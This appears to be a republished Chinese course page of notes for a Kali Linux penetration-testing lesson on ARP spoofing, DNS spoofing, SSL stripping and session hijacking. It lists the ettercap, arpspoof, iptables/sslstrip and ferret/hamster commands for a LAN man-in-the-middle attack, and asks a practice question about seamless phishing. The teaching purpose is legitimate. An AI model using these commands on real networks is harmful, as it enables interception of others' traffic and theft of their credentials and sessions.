Kali Linux Web 渗透测试视频教程—第十四课-arp欺骗、嗅探、dns欺骗、session劫持

本文涉及的产品
公共DNS(含HTTPDNS解析),每月1000万次HTTP解析
云解析 DNS,旗舰版 1个月
全局流量管理 GTM,标准版 1个月
简介:

Kali Linux Web 渗透测试视频教程—第十四课-arp欺骗、嗅探、dns欺骗、session劫持

/玄魂

目录

Kali Linux Web 渗透测试—第十四课-arp欺骗、嗅探、dns欺骗、session劫持      1

关于嗅探、arp欺骗、会话劫持.............................................................. 1

 

视频教程地址:http://edu.51cto.com/course/course_id-1887.html

关于嗅探、arp欺骗、会话劫持

l  1. google

l  2. http://www.cnblogs.com/xuanhun/archive/2009/01/05/1369828.html

l  http://www.cnblogs.com/xuanhun/archive/2009/04/22/1441274.html

会话劫持的实现手段

 

l  中间人攻击(arp欺骗,dns欺骗)

l  注射式攻击

Arp欺骗--ettercap

l  参数说明:http://www.91ri.org/4408.html

l  2.如果你是第一次进行中间人攻击操作,那么要对kali下的ettercap做点配置,配置文件是/etc/ettercap/etter.conf
首先你要将EC_UID EC_GID都变为0,然后找到LINUX分类下的IF YOU USE IPTABLES这一行,将注释(“#”号)去掉,打开转发。

3./etc/NetworkManager/NetworkManager.conf  修改

4.service network-manager restart

5.echo 1 >> /proc/sys/net/ipv4/ip_forward

6. ettercap -i wlan0 -Tq -M arp:remote /192.168.2.20/ /192.168.2.1/

Arp欺骗arpspoof

l   echo 1 >> /proc/sys/net/ipv4/ip_forward

l   arpspoof -i eth0 -t 192.168.14.2 192.168.14.132

数据包捕获

l  tcpdump

l  wireshark

l  drafnet等其他自动化工具

Ssl数据嗅探

l  iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(设置)

l  iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(取消)

l  sslstrip  -p -l 10000 -w log.txt

session劫持-arp欺骗

l  tcpdump -i eth0 -w qq.cap

l  ferret -r qq.cap

l  hamster

l  http://hamster

l  选择目标

l  测试session

64位下ferret 安装

l   dpkg --add-architecture i386

l   apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

l   sudo aptitude install ferret-sidejack:i386

 

session劫持-DNS欺骗

l   1. 使用 ettercap 进行arp欺骗

l   2.修改etter.dns 文件

/etc/ettercap/etter.dns

l   3.启用dns_spoof

课后练习

l  结合前面课程中的 set 工具集,我们在局域网中能做到天衣无缝(钓鱼和消息转发相结合)的钓鱼攻击吗?

l  局域网中的嗅探、钓鱼、session劫持、dns欺骗这一类的攻击的防御方式是什么?

 视频教程地址:http://edu.51cto.com/course/course_id-1887.html

ps:对此文章感兴趣的读者,可以加qq群:Hacking:303242737;Hacking-2群:147098303Hacking-3群:31371755hacking-4:201891680;Hacking-5群:316885176

 


本文转自玄魂博客园博客,原文链接:http://www.cnblogs.com/xuanhun/p/4117209.html,如需转载请自行联系原作者

目录
相关文章
|
1月前
|
人工智能 Linux iOS开发
Burp Suite Professional 2025.2 (macOS, Linux, Windows) - Web 应用安全、测试和扫描
Burp Suite Professional 2025.2 (macOS, Linux, Windows) - Web 应用安全、测试和扫描
56 12
Burp Suite Professional 2025.2 (macOS, Linux, Windows) - Web 应用安全、测试和扫描
|
24天前
|
Linux 网络安全 iOS开发
Metasploit Framework 6.4.49 (macOS, Linux, Windows) - 开源渗透测试框架
Metasploit Framework 6.4.49 (macOS, Linux, Windows) - 开源渗透测试框架
36 0
Metasploit Framework 6.4.49 (macOS, Linux, Windows) - 开源渗透测试框架
|
2月前
|
弹性计算 运维 Ubuntu
os-copilot在Alibaba Cloud Linux镜像下的安装与功能测试
我顺利使用了OS Copilot的 -t -f 功能,我的疑惑是在换行的时候就直接进行提问了,每次只能写一个问题,没法连续换行更有逻辑的输入问题。 我认为 -t 管道 功能有用 ,能解决环境问题的连续性操作。 我认为 -f 管道 功能有用 ,可以单独创建可连续性提问的task问题。 我认为 | 对文件直接理解在新的服务器理解有很大的帮助。 此外,我还有建议 可以在非 co 的环境下也能进行连续性的提问。
90 7
|
2月前
|
安全 Linux 测试技术
Intel Linux 内核测试套件-LKVS介绍 | 龙蜥大讲堂104期
《Intel Linux内核测试套件-LKVS介绍》(龙蜥大讲堂104期)主要介绍了LKVS的定义、使用方法、测试范围、典型案例及其优势。LKVS是轻量级、低耦合且高代码覆盖率的测试工具,涵盖20多个硬件和内核属性,已开源并集成到多个社区CICD系统中。课程详细讲解了如何使用LKVS进行CPU、电源管理和安全特性(如TDX、CET)的测试,并展示了其在实际应用中的价值。
|
3月前
|
Linux Shell 网络安全
Kali Linux系统Metasploit框架利用 HTA 文件进行渗透测试实验
本指南介绍如何利用 HTA 文件和 Metasploit 框架进行渗透测试。通过创建反向 shell、生成 HTA 文件、设置 HTTP 服务器和发送文件,最终实现对目标系统的控制。适用于教育目的,需合法授权。
108 9
Kali Linux系统Metasploit框架利用 HTA 文件进行渗透测试实验
|
8天前
|
算法 测试技术 C语言
深入理解HTTP/2:nghttp2库源码解析及客户端实现示例
通过解析nghttp2库的源码和实现一个简单的HTTP/2客户端示例,本文详细介绍了HTTP/2的关键特性和nghttp2的核心实现。了解这些内容可以帮助开发者更好地理解HTTP/2协议,提高Web应用的性能和用户体验。对于实际开发中的应用,可以根据需要进一步优化和扩展代码,以满足具体需求。
52 29
|
4月前
|
监控 Java 应用服务中间件
高级java面试---spring.factories文件的解析源码API机制
【11月更文挑战第20天】Spring Boot是一个用于快速构建基于Spring框架的应用程序的开源框架。它通过自动配置、起步依赖和内嵌服务器等特性,极大地简化了Spring应用的开发和部署过程。本文将深入探讨Spring Boot的背景历史、业务场景、功能点以及底层原理,并通过Java代码手写模拟Spring Boot的启动过程,特别是spring.factories文件的解析源码API机制。
150 2
|
5天前
|
前端开发 数据安全/隐私保护 CDN
二次元聚合短视频解析去水印系统源码
二次元聚合短视频解析去水印系统源码
23 3
|
7天前
|
JavaScript 算法 前端开发
JS数组操作方法全景图,全网最全构建完整知识网络!js数组操作方法全集(实现筛选转换、随机排序洗牌算法、复杂数据处理统计等情景详解,附大量源码和易错点解析)
这些方法提供了对数组的全面操作,包括搜索、遍历、转换和聚合等。通过分为原地操作方法、非原地操作方法和其他方法便于您理解和记忆,并熟悉他们各自的使用方法与使用范围。详细的案例与进阶使用,方便您理解数组操作的底层原理。链式调用的几个案例,让您玩转数组操作。 只有锻炼思维才能可持续地解决问题,只有思维才是真正值得学习和分享的核心要素。如果这篇博客能给您带来一点帮助,麻烦您点个赞支持一下,还可以收藏起来以备不时之需,有疑问和错误欢迎在评论区指出~
|
16天前
|
移动开发 前端开发 JavaScript
从入门到精通:H5游戏源码开发技术全解析与未来趋势洞察
H5游戏凭借其跨平台、易传播和开发成本低的优势,近年来发展迅猛。接下来,让我们深入了解 H5 游戏源码开发的技术教程以及未来的发展趋势。

相关产品

  • 云解析DNS